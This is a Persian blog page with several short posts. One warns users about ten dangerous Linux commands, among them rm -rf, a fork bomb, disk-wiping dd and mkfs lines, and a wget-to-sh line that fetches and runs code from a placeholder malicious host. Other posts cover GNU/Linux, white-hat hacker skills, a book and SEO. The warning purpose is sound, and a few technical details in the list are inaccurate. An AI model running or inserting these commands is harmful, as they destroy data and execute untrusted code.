۱۰ فرمان خطرناک لینوکسی!

۱۰ فرمان خطرناک لینوکسی!

همانطور که در مطالب پیشین گفته شد ، گنو لینوکس یکی از سیستهای عامل متفاوت و پایدار در امنیت و شبکه است.
بیش از ۳۰۰۰ فرمان در لینوکس وجود دارد که تقریبا هرکاری را که بخواهیم انجام میدهند! اما همیشه این فرمان ها امن نیستند.
در این نوشته به بررسی برخی فرمانهای خطرناک لینوکس میپردازیم که کاربران باید با دقت بیشتری به آن توجه کنند.

۱٫ rm -rf

این فرمان سریعترین راه حذف فولدرها و محتویات درون آنها است. خیلی دقت کنید که پارامتر rf یعنی بدون هیچ سئوالی تمام فایلها و فولدرها حذف شوند!!

۲٫ :(){:|:&};:

این فرمان عجیب و غریب ، یک بمب فراخوان سیستمی یا Fork Bomb است.اگر در محیط ترمینال اجرا شود با فراخوانی پی در پی خودش موجب از کار افتادن سیستم عامل خواهد شد…

۳٫ mv folder /dev/null

فرمان mv برای انتقال فایلها و فولدرها است و مسیر /dev/null یک مسیر مخصوص برای در نظر نگرفتن گزارشات و خروجی هاست.اگر در فرمان mv هدف یا مقصد را برابر با null قرار دهیم ؛ تمام فایلهای انتقالی را به چاله سیاه یا blackhole فرستاده ایم!!!

۴٫ command > /dev/sda

بلاک /dev/sda یعنی هارد دیسک.فرمان بالا خطی از داده ها را به سمت بلاک مقصد میفرستد و این یعنی از بین رفتن داده های روی بلاک یا هارد دیسک….

۵٫ wget http://malicios_source -0- |sh

فرمان wget میتواند یک اسکریپت یا بد افزار را دانلود و مستقیما به خط فرمان یا shell بفرستد و آن را اجرا کند…

۶٫ mkfs.ext3 /dev/sda

این فرمان بلاک SDA یا همان هارد دیسک را فورمت خواهد کرد…یعنی کل پارتیشن ها و داده های آنها نابود خواهد شد و قابل بازیابی هم نیست…

۷٫ > file

محتوای یک فایل را بطور کامل حذف خواهد کرد…

۸٫ ^foo^bar

یکی از خطرناک ترین فرامین ، میتواند هر فرمانی را به هر فرمانی تبدیل کند… مثلا ls^rm -rf^ فرمان لیست گیری را تبدیل به نابود کننده میکند…

۹٫ dd if=/dev/random of=/dev/sda

این فرمان تمام داده های هارد دیسک را با اطلاعاتی تصادفی پر میکند که در نتیجه اطلاعات هارد دیسک نابود میشود و غیر قابل بازیابی است…

۱۰٫ Hidden the Command

فرامین مخفی ، میتوان فرامین را در قالب hex بصورتی پنهانی در ترمینال اجرا کرد و …

 

این نوشته ترجمه و البته همراه با توضیح و اصلاحاتی بود از مطلب ۱۰ Most Dangerous Commands.

لطفا این مطلب را برای دوستان خود ارسال کنید

معرفی کتاب – ارتباط تصویری

معرفی کتاب – ارتباط تصویری

در حال مطالعه ۲ کتاب ارزشمند از استاد سرکار خانم فهیمه پهلوان هستم که منتخب و گزیده مطالب آن را در سایت قرار خواهم داد.
این کتابها “درآمدی بر تحلیل عناصر تصویری در آرم” و “ارتباط تصویری از چشم‌انداز نشانه‌شناسی” نام دارند.
ناشر دانشگاه هنر است.

منتظر نوشته های من درباره این کتابها باشید!


معرفی و تحلیل کتاب به قلم دکتر مهرداد صدقی را هم در اینترنت دیدم که براتون لینک میکنم.

  • یک نکته ای که ممکنه برای بعضی دوستان سئوال باشه اینه که اهمیت این کتاب چیه و اصلا بدرد چه کسانی میخوره؟
    پاسخ: آرم و لوگو اهمیت زیادی برای کسب و کارها داره. شناخت مفاهیم مرتبط با آن میتونه کمک کنه به درک مفاهیمی مثل برندینگ و هویت سازمانی و …
لطفا این مطلب را برای دوستان خود ارسال کنید

گنو لینوکس چیست؟

گنو لینوکس چیست؟

لینوکس یا بهتر است بگوییم “گنو/لینوکس” همانند ویندوز و مک و نظایر آنها ، از سیستم های عامل برتر جهان است.
لینوکس در سال ۱۹۹۱ توسط آقای لینیوس توروالدز دانشجوی هکر فنلاندی نوشته شد و در ادامه انقلابی به نام انقلاب متن باز یا Open Source Revelation باعث معرفی این سیستم عامل قدرتمند به دنیا گردید.(دیدن فیلم انقلاب اوپن سورس را توصیه میکنم).

گنو لینوکس هسته با بیش از ۱۵۰۰ توزیع متفاوت (میتوانید در سایت distrowatch تمام توزیع های آن را ببینید یا دانلود کنید) برای هر کاری نسخه ای ویژه دارد. برای کاربران خانگی ؛ اداری ؛ امنیت کاران، گرافیست ها ، گیمیرها  ؛ شبکه کاران و…. ؛ حتی برای کودکان نیز توزیع هایی را در نظر گرفته است.

اهمیت لینوکس در این است که شرکتهای بزرگی همچون گوگل و یاهو و حتی مایکروسافت از سرورهای لینوکسی بهره میبرند.حتی اپل نیز از توزیع های یونیکسی که لینوکس هم از آن بوجود آمده است استفاده میکنند.تقریبا تمام متخصصین امنیتی و شبکه کاران از توزیع های مختلف لینوکسی بهره میبرند.

گنو چیست؟ این مطلب از ویکی پدیا قابل مطالعه است:

برای دیگر کاربردها، گنو (ابهام‌زدایی) را ببینید.
سیستم‌عامل گنو در سال ۱۹۸۳ با هدف ایجاد یک سیستم‌عامل کامل و آزاد شبه-یونیکس به‌وسیله ریچارد استالمن پایه‌گذاری شد. GNU مخفف بازگشتی «GNU’s Not Unix» است.
پروژه گنو در سال ۱۹۸۴ با هدف پشتیبانی و تولید نرم‌افزار آزاد برای سیستم‌عامل گنو تأسیس شد.
بنیاد نرم‌افزار آزاد در سال ۱۹۸۵ با هدف حمایت از جنبش نرم‌افزار آزاد و به ویژه پروژهٔ گنو شروع به کار کرد.
امروزه مهم‌ترین و رایج‌ترین سیستم‌عاملی که از نرم‌افزارهای پروژه گنو و پروانه GNU GPL استفاده می‌کند، لینوکس است که از کرنل لینوکس استفاده می‌کند و به شکل توزیع لینوکس عرضه می‌شود که بعضی اشخاص به آن «گنو/لینوکس» می‌گویند. (بحث نامگذاری لینوکس)

فرق لینوکس با ویندوز چیست (خواندن این مقاله را پیشنهاد میکنم)؟
بطور کلی پایداری و سرعت و امنیت لینوکس بالا است. با سخت افزارها سازگاری بیشتری دارد و کار به آن نیز حرفه ای تر است.
در این مقاله معرفی مختصری از “گنو/لینوکس” را تقدیمتان کردم و در نوشته های بعدی توضیحات فنی تر و بیشتری در این باره خواهم داد.
همین امروز لینوکس را یاد بگیرید! راستی من دوره های آموزشی لینوکس را هم دارم که برایتان معرفی خواهم کرد.
لطفا این مطلب را برای دوستان خود ارسال کنید

مهارتهای اصلی برای یک هکر حرفه ای

مهارتهای اصلی برای یک هکر حرفه ای

آیا هکرها آدمهای خوبی هستند یا بد؟ بستگی به تعریف آنها دارد! هکرهای کلاه سفید یا قانونمند از دانش خود برای شناسایی نقاط ضعف شبکه و سیستمها استفاده میکنند در حالیکه هکرهای کلاه سیاه بیشتر برای سرقت و تخریب و مقاصد منفی دست به کارهای نفوذ و هک میزنند.

آیا هکر شدن آسان است؟ نه. در حقیقت راه دشواری پیش روی آنها است.باید دانش و تجربه فراوانی را کسب کنند و در کنار آنها از خلاقیت و کنجکاوی خاص هکرها برای اکتشاف راه های پنهانی بهره ببرند.

در این نوشته به بررسی مهارتهای اصلی که برای یک هکر حرفه ای شدن لازم است میپردازیم:

۱- مهارت های اصلی کامپیوتری:
– مهارتهای اولیه کامپیوتری مانند کار با سیستمهای عامل و آفیس و اینترنت و …

۲- مهارت های شبکه:
–  باید اصول شبکه و مفاهیم آن را بدانید.مواردی همچون :

  • DHCP
  • NAT
  • Subnetting
  • IPv4
  • IPv6
  • Public v Private IP
  • DNS
  • Routers and switches
  • VLANs
  • OSI model
  • MAC addressing
  • ARP

۳- مهارت در لینوکس
– بدلیل ابزارهای خاص امنیتی در توزیع های لینوکسی ، لازم است هکر ها به خوبی با گنولینوکس آشنا باشند و توانایی نصب و کانفیگ توزیهای کلاینتی و سروری آن را بدانند.

۴- وایرشارک!
– یکی از نرم افزارهای خاص امنیتی Wire-shark است که توانایی تحلیل و آنالیز بسته های ارسالی در شبکه را دارد.

۵- مجازی سازی:
– کار به نرم افزارهای مجازی سازی یا Virtualization بسیار مهم است.علاوه بر ایمن نگاه داشتن یک محیط برای تست امکان اجرای بسیاری از فرامین از طریق ماشین های مجازی درون آن وجود دارد.

۶- فناوریها و مفهوم امنیت
– یک هکر خوب باید مفاهیم و فناوری های امنیتی را بخوبی بشناسد تا بتواند از هر کدام آنها برای کارهای خاصی بهره ببرد.مثلا با SSL,PKI,IDS و نظایر آن آشنا باشد.

۷- فناوری های بیسیم
– آشنایی و مهارت در استفاده از فناوری های بیسیم مانند WEP,WPA و نظایر آن بسیار مهم است.

۸- اسکریپت نویسی:
– بدون مهارت اسکپریپت نویسی هکر مجبور است از ابزارهای دیگری استفاده کند که تاثیر پذیری کمتر و محدودیت بیشتری را برایش خواهد داشت.دانش پرل ، بش ؛ پاورشل و … مهم است.

۹- مهارت های بانکهای اطلاعاتی:
– بخش مهمی از امنیت مربوط با دیتابیس ها یا بانکهای اطلاعاتی است.هکرها باید بخوبی با بانکهای اطلاعاتی مختلف آشنا باشند

۱۰ – برنامه های تحت وب یا وب اپلیکیشن ها
– امروزه بسیاری از شرکت ها و سازمان ها و حتی کاربران به سمت استفاده از نرم افزارهای تحت وب رفته اند.لذا متخصص امنیتی نیز باید با برنامه ها تحت و ب مخصوصا ابزارهای خاص امنیتی آشنا باشد

۱۱-  بازرسی:
– بازرسی یا جرم شناسی یا Forensics نیز برای هکرها و متخصصین امنیتی بسیار مهم است.در آینده مطالب بیشتری درباره این موضوع خواهیم نوشت.

۱۲- رمزنگاری
– علم رمزنگاری شامل رمزگذاری و رمز گشایی یکی از آن موضوعات خاصی است که تقریبا جزو اصلی ترین علومی است که یک متخصص امنیتی باید بداند

۱۳- مهندسی معکوس:
– مهندسی معکوس به هکرها اجازه میدهد یا بدافزار را مجدد بسازند و امکانات مختلفی را به آن اضافه کنند.

۱۴- تفکر خلاقانه
–  بر خلاف موارد دیگر که اکتسابی و قابل آموختن هستند این ویژگی ذاتی است.هکرها باید دارای قدرت تفکر خلاقانه برای حمل مسائل باشند.

امیدواریم شما یک متخصص امنیتی و هکر کلاه سفید بشوید و از دانش خود برای رفع مشکلات و نیازهای دیگران استفاده کنید.

لطفا این مطلب را برای دوستان خود ارسال کنید

سئو یا بهینه سازی برای موتورهای جستجو چیست؟

سئو یا بهینه سازی برای موتورهای جستجو چیست؟

Search Engine Optimization (SEO) هنر و علم کمک به وبسایتها است تا در نتایج جستجوگرهای بزرگ دیده شوند.
سئو یعنی استفاده از تکنیکهای مختلف برای بهتر شدن کلمات کلیدی یا عبارات کلیدی یک وبسایت در رتبه نتایج موتورهای جستجوگر.
سئو یک فرایند تکنیکال است تا کلمات کلیدی بهینه شده وبسایت ها در دیتابیس های موتورهای جستجو ایندکس شوند و موارد مرتبط با آنها مشخص شود.به پیوندهای بین کلمات کلیدی و صفحات مرتبط با آن که شاخص سازی شده است ؛ لیستهای طبیعی گفته میشود.
سئو باید در تمام ۲۴ ساعت شبانه روز و تمام ۳۶۵ روز سال انجام و تکرار شود تا با افزایش بازدید هدفمند وبسایت و افزایش فروش ؛ منجر به بازگشت سرمایه یا ROI شود.
اگر دوست دارید بیشتز درباره سئو بدانید و بخوانید سایتهای زیر را پیشنهاد میکنم:

bruceclay.com/web_rank.htm
www.rustybrick.com/definitions.php
www.submitexpress.com
 www.seochat.com
www.seoimage.com

ادامه دارد…

لطفا این مطلب را برای دوستان خود ارسال کنید